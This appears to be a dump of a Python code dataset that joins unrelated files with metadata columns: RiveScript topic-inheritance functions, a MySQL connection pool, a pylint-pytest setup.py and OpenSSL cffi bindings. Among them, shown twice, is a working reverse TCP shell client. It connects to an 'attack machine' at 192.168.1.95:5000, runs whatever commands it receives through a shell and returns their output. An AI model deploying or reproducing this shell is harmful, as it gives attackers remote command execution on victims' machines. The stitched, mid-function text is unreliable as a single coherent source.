if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itrs.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| en | 0.90507 | # RiveScript-Python # # This code is released under the MIT License. # See the "LICENSE" file for more information. # # https://www.rivescript.com/ Recursively scan a topic and return a list of all triggers. Arguments: rs (RiveScript): A reference to the parent RiveScript instance. topic (str): The original topic name. thats (bool): Are we getting triggers for 'previous' replies? depth (int): Recursion step counter. inheritance (int): The inheritance level counter, for topics that inherit other topics. inherited (bool): Whether the current topic is inherited by others. Returns: []str: List of all triggers found. # Break if we're in too deep. # Keep in mind here that there is a difference between 'includes' and # 'inherits' -- topics that inherit other topics are able to OVERRIDE # triggers that appear in the inherited topic. This means that if the top # topic has a trigger of simply '*', then NO triggers are capable of # matching in ANY inherited topic, because even though * has the lowest # priority, it has an automatic priority over all inherited topics. # # The getTopicTriggers method takes this into account. All topics that # inherit other topics will have their triggers prefixed with a fictional # {inherits} tag, which would start at {inherits=0} and increment if this # topic has other inheriting topics. So we can use this tag to make sure # topics that inherit things will have their triggers always be on top of # the stack, from inherits=0 to inherits=n. # Important info about the depth vs inheritance params to this function: # depth increments by 1 each time this function recursively calls itrs. # inheritance increments by 1 only when this topic inherits another # topic. # # This way, '> topic alpha includes beta inherits gamma' will have this # effect: # alpha and beta's triggers are combined together into one matching # pool, and then those triggers have higher matching priority than # gamma's. # # The inherited option is True if this is a recursive call, from a topic # that inherits other topics. This forces the {inherits} tag to be added # to the triggers. This only applies when the top topic 'includes' # another topic. # topic: the name of the topic # depth: starts at 0 and ++'s with each recursion # Topic doesn't exist? # Collect an array of triggers to return. # Get those that exist in this topic directly. # The non-that structure is {topic}->[array of triggers] # The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info} # Does this topic include others? # Check every included topic. # Does this topic inherit others? # Check every inherited topic. # Collect the triggers for *this* topic. If this topic inherits any # other topics, it means that this topic's triggers have higher # priority than those in any inherited topics. Enforce this with an # {inherits} tag. Given one topic, get the list of all included/inherited topics. :param str topic: The topic to start the search at. :param int depth: The recursion depth counter. :return []str: Array of topics. # Break if we're in too deep. # Collect an array of all topics. # Does this topic include others? # Try each of these. # Does this topic inherit others? # Try each of these. | 2.75561 | 3 |
src/dataAccess/Connection.py | mattmillr/utaka | 1 | 9175 | <filename>src/dataAccess/Connection.py
#Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
if len(dcp) > 0:
if useDictCursor:
self.innerConn = dcp.pop()
else:
self.innerConn = rcp.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
| <filename>src/dataAccess/Connection.py
#Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
if len(dcp) > 0:
if useDictCursor:
self.innerConn = dcp.pop()
else:
self.innerConn = rcp.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
| en | 0.85452 | #Copyright 2009 Humanitarian International Services Group # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. Created Aug 4, 2009 connection pool abstraction over previous Connection.py which is now SingleConnection.py sets up module scope connection pool, currently with no size limit pool for both connections with dictionary cursors and regular cursors reconnects to db every x hours depending on config file @author: Andrew | 2.558036 | 3 |
setup.py | DKorytkin/pylint-pytest | 0 | 9176 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| en | 0.352855 | #!/usr/bin/env python # -*- coding: utf-8 -*- | 1.327682 | 1 |
Shells/Python/Client/TCPReverseShell.py | lismore/OffensiveCyberTools | 1 | 9177 | # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a termiante string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a termiante string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| en | 0.555668 | # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments # Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore #========================================================================================================================================= # Python TCP Client #Start client function # create the socket object 'sock' # Replace the IP and listening port to your attack machine # start an infinite loop # read the 1st KB of the tcp socket # if we get a termiante string from the attack machine then we will close the socket, end the loop # or else, the sent command gets sent to the victim shell process # return shell result # return any shell errors #Main function #Program entry point | 2.982497 | 3 |
src/_cffi_src/openssl/engine.py | balabit-deps/balabit-os-6-python-cryptography | 0 | 9178 | <filename>src/_cffi_src/openssl/engine.py<gh_stars>0
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/engine.h>
"""
TYPES = """
static const long Cryptography_HAS_ENGINE_CRYPTODEV;
typedef ... ENGINE;
typedef ... RSA_METHOD;
typedef ... DSA_METHOD;
typedef ... ECDH_METHOD;
typedef ... ECDSA_METHOD;
typedef ... DH_METHOD;
typedef struct {
void (*seed)(const void *, int);
int (*bytes)(unsigned char *, int);
void (*cleanup)();
void (*add)(const void *, int, double);
int (*pseudorand)(unsigned char *, int);
int (*status)();
} RAND_METHOD;
typedef ... STORE_METHOD;
typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
typedef ... *ENGINE_CTRL_FUNC_PTR;
typedef ... *ENGINE_LOAD_KEY_PTR;
typedef ... *ENGINE_CIPHERS_PTR;
typedef ... *ENGINE_DIGESTS_PTR;
typedef ... ENGINE_CMD_DEFN;
typedef ... UI_METHOD;
static const unsigned int ENGINE_METHOD_RSA;
static const unsigned int ENGINE_METHOD_DSA;
static const unsigned int ENGINE_METHOD_RAND;
static const unsigned int ENGINE_METHOD_ECDH;
static const unsigned int ENGINE_METHOD_ECDSA;
static const unsigned int ENGINE_METHOD_CIPHERS;
static const unsigned int ENGINE_METHOD_DIGESTS;
static const unsigned int ENGINE_METHOD_STORE;
static const unsigned int ENGINE_METHOD_ALL;
static const unsigned int ENGINE_METHOD_NONE;
static const int ENGINE_R_CONFLICTING_ENGINE_ID;
"""
FUNCTIONS = """
ENGINE *ENGINE_get_first(void);
ENGINE *ENGINE_get_last(void);
ENGINE *ENGINE_get_next(ENGINE *);
ENGINE *ENGINE_get_prev(ENGINE *);
int ENGINE_add(ENGINE *);
int ENGINE_remove(ENGINE *);
ENGINE *ENGINE_by_id(const char *);
int ENGINE_init(ENGINE *);
int ENGINE_finish(ENGINE *);
void ENGINE_load_openssl(void);
void ENGINE_load_dynamic(void);
void ENGINE_load_builtin_engines(void);
void ENGINE_cleanup(void);
ENGINE *ENGINE_get_default_RSA(void);
ENGINE *ENGINE_get_default_DSA(void);
ENGINE *ENGINE_get_default_ECDH(void);
ENGINE *ENGINE_get_default_ECDSA(void);
ENGINE *ENGINE_get_default_DH(void);
ENGINE *ENGINE_get_default_RAND(void);
ENGINE *ENGINE_get_cipher_engine(int);
ENGINE *ENGINE_get_digest_engine(int);
int ENGINE_set_default_RSA(ENGINE *);
int ENGINE_set_default_DSA(ENGINE *);
int ENGINE_set_default_ECDH(ENGINE *);
int ENGINE_set_default_ECDSA(ENGINE *);
int ENGINE_set_default_DH(ENGINE *);
int ENGINE_set_default_RAND(ENGINE *);
int ENGINE_set_default_ciphers(ENGINE *);
int ENGINE_set_default_digests(ENGINE *);
int ENGINE_set_default_string(ENGINE *, const char *);
int ENGINE_set_default(ENGINE *, unsigned int);
unsigned int ENGINE_get_table_flags(void);
void ENGINE_set_table_flags(unsigned int);
int ENGINE_register_RSA(ENGINE *);
void ENGINE_unregister_RSA(ENGINE *);
void ENGINE_register_all_RSA(void);
int ENGINE_register_DSA(ENGINE *);
void ENGINE_unregister_DSA(ENGINE *);
void ENGINE_register_all_DSA(void);
int ENGINE_register_ECDH(ENGINE *);
void ENGINE_unregister_ECDH(ENGINE *);
void ENGINE_register_all_ECDH(void);
int ENGINE_register_ECDSA(ENGINE *);
void ENGINE_unregister_ECDSA(ENGINE *);
void ENGINE_register_all_ECDSA(void);
int ENGINE_register_DH(ENGINE *);
void ENGINE_unregister_DH(ENGINE *);
void ENGINE_register_all_DH(void);
int ENGINE_register_RAND(ENGINE *);
void ENGINE_unregister_RAND(ENGINE *);
void ENGINE_register_all_RAND(void);
int ENGINE_register_STORE(ENGINE *);
void ENGINE_unregister_STORE(ENGINE *);
void ENGINE_register_all_STORE(void);
int ENGINE_register_ciphers(ENGINE *);
void ENGINE_unregister_ciphers(ENGINE *);
void ENGINE_register_all_ciphers(void);
int ENGINE_register_digests(ENGINE *);
void ENGINE_unregister_digests(ENGINE *);
void ENGINE_register_all_digests(void);
int ENGINE_register_complete(ENGINE *);
int ENGINE_register_all_complete(void);
int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void));
int ENGINE_cmd_is_executable(ENGINE *, int);
int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int);
int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int);
ENGINE *ENGINE_new(void);
int ENGINE_free(ENGINE *);
int ENGINE_up_ref(ENGINE *);
int ENGINE_set_id(ENGINE *, const char *);
int ENGINE_set_name(ENGINE *, const char *);
int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *);
int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *);
int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *);
int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *);
int ENGINE_set_DH(ENGINE *, const DH_METHOD *);
int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *);
int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *);
int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR);
int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR);
int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR);
int ENGINE_set_flags(ENGINE *, int);
int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *);
const char *ENGINE_get_id(const ENGINE *);
const char *ENGINE_get_name(const ENGINE *);
const RSA_METHOD *ENGINE_get_RSA(const ENGINE *);
const DSA_METHOD *ENGINE_get_DSA(const ENGINE *);
const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *);
const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *);
const DH_METHOD *ENGINE_get_DH(const ENGINE *);
const RAND_METHOD *ENGINE_get_RAND(const ENGINE *);
const STORE_METHOD *ENGINE_get_STORE(const ENGINE *);
const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int);
const EVP_MD *ENGINE_get_digest(ENGINE *, int);
int ENGINE_get_flags(const ENGINE *);
const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *);
EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *);
EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *);
void ENGINE_add_conf_module(void);
"""
MACROS = """
void ENGINE_load_cryptodev(void);
"""
CUSTOMIZATIONS = """
#if defined(LIBRESSL_VERSION_NUMBER)
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0;
void (*ENGINE_load_cryptodev)(void) = NULL;
#else
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1;
#endif
"""
| <filename>src/_cffi_src/openssl/engine.py<gh_stars>0
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/engine.h>
"""
TYPES = """
static const long Cryptography_HAS_ENGINE_CRYPTODEV;
typedef ... ENGINE;
typedef ... RSA_METHOD;
typedef ... DSA_METHOD;
typedef ... ECDH_METHOD;
typedef ... ECDSA_METHOD;
typedef ... DH_METHOD;
typedef struct {
void (*seed)(const void *, int);
int (*bytes)(unsigned char *, int);
void (*cleanup)();
void (*add)(const void *, int, double);
int (*pseudorand)(unsigned char *, int);
int (*status)();
} RAND_METHOD;
typedef ... STORE_METHOD;
typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
typedef ... *ENGINE_CTRL_FUNC_PTR;
typedef ... *ENGINE_LOAD_KEY_PTR;
typedef ... *ENGINE_CIPHERS_PTR;
typedef ... *ENGINE_DIGESTS_PTR;
typedef ... ENGINE_CMD_DEFN;
typedef ... UI_METHOD;
static const unsigned int ENGINE_METHOD_RSA;
static const unsigned int ENGINE_METHOD_DSA;
static const unsigned int ENGINE_METHOD_RAND;
static const unsigned int ENGINE_METHOD_ECDH;
static const unsigned int ENGINE_METHOD_ECDSA;
static const unsigned int ENGINE_METHOD_CIPHERS;
static const unsigned int ENGINE_METHOD_DIGESTS;
static const unsigned int ENGINE_METHOD_STORE;
static const unsigned int ENGINE_METHOD_ALL;
static const unsigned int ENGINE_METHOD_NONE;
static const int ENGINE_R_CONFLICTING_ENGINE_ID;
"""
FUNCTIONS = """
ENGINE *ENGINE_get_first(void);
ENGINE *ENGINE_get_last(void);
ENGINE *ENGINE_get_next(ENGINE *);
ENGINE *ENGINE_get_prev(ENGINE *);
int ENGINE_add(ENGINE *);
int ENGINE_remove(ENGINE *);
ENGINE *ENGINE_by_id(const char *);
int ENGINE_init(ENGINE *);
int ENGINE_finish(ENGINE *);
void ENGINE_load_openssl(void);
void ENGINE_load_dynamic(void);
void ENGINE_load_builtin_engines(void);
void ENGINE_cleanup(void);
ENGINE *ENGINE_get_default_RSA(void);
ENGINE *ENGINE_get_default_DSA(void);
ENGINE *ENGINE_get_default_ECDH(void);
ENGINE *ENGINE_get_default_ECDSA(void);
ENGINE *ENGINE_get_default_DH(void);
ENGINE *ENGINE_get_default_RAND(void);
ENGINE *ENGINE_get_cipher_engine(int);
ENGINE *ENGINE_get_digest_engine(int);
int ENGINE_set_default_RSA(ENGINE *);
int ENGINE_set_default_DSA(ENGINE *);
int ENGINE_set_default_ECDH(ENGINE *);
int ENGINE_set_default_ECDSA(ENGINE *);
int ENGINE_set_default_DH(ENGINE *);
int ENGINE_set_default_RAND(ENGINE *);
int ENGINE_set_default_ciphers(ENGINE *);
int ENGINE_set_default_digests(ENGINE *);
int ENGINE_set_default_string(ENGINE *, const char *);
int ENGINE_set_default(ENGINE *, unsigned int);
unsigned int ENGINE_get_table_flags(void);
void ENGINE_set_table_flags(unsigned int);
int ENGINE_register_RSA(ENGINE *);
void ENGINE_unregister_RSA(ENGINE *);
void ENGINE_register_all_RSA(void);
int ENGINE_register_DSA(ENGINE *);
void ENGINE_unregister_DSA(ENGINE *);
void ENGINE_register_all_DSA(void);
int ENGINE_register_ECDH(ENGINE *);
void ENGINE_unregister_ECDH(ENGINE *);
void ENGINE_register_all_ECDH(void);
int ENGINE_register_ECDSA(ENGINE *);
void ENGINE_unregister_ECDSA(ENGINE *);
void ENGINE_register_all_ECDSA(void);
int ENGINE_register_DH(ENGINE *);
void ENGINE_unregister_DH(ENGINE *);
void ENGINE_register_all_DH(void);
int ENGINE_register_RAND(ENGINE *);
void ENGINE_unregister_RAND(ENGINE *);
void ENGINE_register_all_RAND(void);
int ENGINE_register_STORE(ENGINE *);
void ENGINE_unregister_STORE(ENGINE *);
void ENGINE_register_all_STORE(void);
int ENGINE_register_ciphers(ENGINE *);
void ENGINE_unregister_ciphers(ENGINE *);
void ENGINE_register_all_ciphers(void);
int ENGINE_register_digests(ENGINE *);
void ENGINE_unregister_digests(ENGINE *);
void ENGINE_register_all_digests(void);
int ENGINE_register_complete(ENGINE *);
int ENGINE_register_all_complete(void);
int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void));
int ENGINE_cmd_is_executable(ENGINE *, int);
int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int);
int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int);
